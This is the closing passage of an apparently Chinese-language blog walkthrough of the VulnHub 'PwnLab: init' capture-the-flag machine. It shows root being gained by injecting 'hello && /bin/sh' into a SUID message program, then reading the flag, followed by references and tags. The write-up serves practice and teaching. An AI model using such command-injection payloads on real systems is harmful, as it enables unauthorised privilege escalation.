`ls /root`
flag.txt messages.txt

aaa應該要用linux命令strings來分析msg2root,不過這裡省略分析的步驟:

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: hello && /bin/sh
hello && /bin/sh
hello
# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
# /bin/cat /root/flag.txt
/bin/cat /root/flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'

Reference

Vulnhub x PwnLab: init
pwnlab-init靶机测试笔记 - 总得前行 - 博客园
PwnLab: Init — Walkthrough
No.18-VulnHub-PwnLab: init-Walkthrough渗透学习
的Base64解碼 - 網上的Base64解碼器
GitHub - SewellDinG/LFIboomCTF: 📖本地文件包含漏洞实践源码及相应协议利用指南
[網站安全漏洞] 4 Command injection 指令注入 » 資安這條路
GitHub - payloadbox/command-injection-payload-list: 🎯 Command Injection Payload List
使用字符串命令 (Using the strings Command)


#attack #Vulnhub #port 80網頁入侵 #LFI #base64 #mysql操作 #圖片上傳 #reverseshell偽裝圖片png #curl改cookie #suid #自創同名指令 #command injection







Related Posts

Inside look at modern web browser

Inside look at modern web browser

陪你讀論文 - Part-Aware Data Augmentation for 3D Object Detection in Point Cloud

陪你讀論文 - Part-Aware Data Augmentation for 3D Object Detection in Point Cloud

程式解題新手入門注意事項

程式解題新手入門注意事項


Comments